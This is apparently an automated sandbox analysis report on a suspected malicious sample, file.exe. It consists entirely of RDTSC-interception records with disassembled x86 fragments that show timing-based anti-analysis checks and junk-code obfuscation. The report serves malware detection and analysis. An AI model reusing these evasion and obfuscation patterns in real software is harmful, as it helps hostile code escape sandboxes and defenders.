Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBBD94 second address: EBBDFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D1845h] 0x00000012 cld 0x00000013 lea eax, dword ptr [ebp+12490B3Ah] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F0154ECB878h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 jmp 00007F0154ECB889h 0x00000038 mov dword ptr [ebp+122D22D6h], edi 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBBDFF second address: E9A751 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0154ED053Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F0154ED0538h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a call dword ptr [ebp+122D5A8Bh] 0x00000030 push esi 0x00000031 jmp 00007F0154ED0543h 0x00000036 jmp 00007F0154ED053Dh 0x0000003b pop esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBBEBC second address: EBBEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB87Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0154ECB882h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC2B6 second address: EBC2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC43C second address: EBC44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC44B second address: EBC44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC44F second address: EBC455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC455 second address: EBC46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0154ED0536h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC46D second address: EBC48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0154ECB882h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC48D second address: EBC49E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED053Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC49E second address: EBC4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F0154ECB883h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC5EE second address: EBC5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC5FB second address: EBC605 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0154ECB876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC669 second address: EBC66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC66D second address: EBC67F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F0154ECB878h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC67F second address: EBC685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC685 second address: EBC689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC744 second address: EBC748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC993 second address: EBC999 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC999 second address: EBC9A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED053Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD1D3 second address: EBD1F9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0154ECB876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D36D2h], ecx 0x00000012 lea eax, dword ptr [ebp+12490B3Ah] 0x00000018 jno 00007F0154ECB878h 0x0000001e push eax 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD1F9 second address: EBD1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD1FD second address: E9B2D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a jns 00007F0154ECB87Ch 0x00000010 call dword ptr [ebp+122D2473h] 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4C54 second address: EF4C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED053Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4C66 second address: EF4C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF51CA second address: EF51CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF51CE second address: EF51E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jbe 00007F0154ECB8A7h 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F0154ECB876h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAFC4 second address: EFAFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAFCC second address: EFAFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAFEA second address: EFB003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F0154ED053Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB2C0 second address: EFB2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0154ECB87Eh 0x0000000d pop edx 0x0000000e jmp 00007F0154ECB881h 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F0154ECB876h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB738 second address: EFB768 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0154ED0536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F0154ED053Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F0154ED0548h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F0154ED0540h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB768 second address: EFB782 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0154ECB87Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnl 00007F0154ECB876h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB782 second address: EFB786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBA40 second address: EFBA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBA46 second address: EFBA4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBA4A second address: EFBA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBA56 second address: EFBA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBA5A second address: EFBA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBA5E second address: EFBA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBFE9 second address: EFBFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBFEF second address: EFBFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFF12B second address: EFF164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB881h 0x00000009 popad 0x0000000a jne 00007F0154ECB87Ch 0x00000010 jmp 00007F0154ECB882h 0x00000015 popad 0x00000016 push eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F02321 second address: F02347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ED0545h 0x00000009 popad 0x0000000a jmp 00007F0154ED053Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F01EBB second address: F01ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB87Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0551C second address: F0554F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0543h 0x00000007 jng 00007F0154ED0538h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jns 00007F0154ED0536h 0x0000001c jno 00007F0154ED0536h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0554F second address: F05554 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F05554 second address: F05563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 jo 00007F0154ED053Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F04DDB second address: F04DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F04DDF second address: F04DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F05239 second address: F0525D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0154ECB876h 0x00000008 jnc 00007F0154ECB876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0154ECB876h 0x00000018 jmp 00007F0154ECB87Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0525D second address: F05261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09940 second address: F09946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09946 second address: F0994F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0994F second address: F09955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09BEC second address: F09BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09D65 second address: F09D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F0154ECB876h 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F0154ECB876h 0x00000016 popad 0x00000017 pop edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0154ECB883h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09D95 second address: F09D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09D99 second address: F09DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0154ECB876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09DA9 second address: F09DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09DAD second address: F09DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0EA8B second address: F0EA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0EA91 second address: F0EA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0EA95 second address: F0EACE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0154ED053Eh 0x0000000f push eax 0x00000010 jmp 00007F0154ED0543h 0x00000015 pushad 0x00000016 js 00007F0154ED0536h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0ED86 second address: F0ED98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F025 second address: F0F055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0543h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0154ED0549h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F055 second address: F0F066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F1E9 second address: F0F1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCDC5 second address: EBCDC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F4AF second address: F0F4D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0154ED0541h 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F4D6 second address: F0F4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0154ECB876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1385F second address: F13865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F13865 second address: F1386B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1386B second address: F13892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0154ED0546h 0x00000009 jmp 00007F0154ED053Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F13892 second address: F13896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1C73C second address: F1C77C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0154ED055Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0154ED0542h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1A9D2 second address: F1A9E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB87Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AF4B second address: F1AF80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED0548h 0x00000007 jmp 00007F0154ED053Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jc 00007F0154ED0536h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AF80 second address: F1AF92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0154ECB876h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AF92 second address: F1AF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B2DD second address: F1B2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F0154ECB882h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B2FA second address: F1B2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B2FE second address: F1B302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B302 second address: F1B317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007F0154ED056Bh 0x0000000d jp 00007F0154ED0542h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B317 second address: F1B33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0154ECB876h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0154ECB887h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B33A second address: F1B33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B634 second address: F1B64B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0154ECB876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F0154ECB878h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F25175 second address: F251B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F0154ED0536h 0x0000000d jmp 00007F0154ED0545h 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F0154ED0542h 0x00000019 jns 00007F0154ED0536h 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F251B9 second address: F251BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F251BD second address: F251D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0154ED053Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F251D0 second address: F251E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0154ECB87Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24A3D second address: F24A67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F0154ED0536h 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0154ED0540h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F0154ED0538h 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24BAB second address: F24BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24BAF second address: F24BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
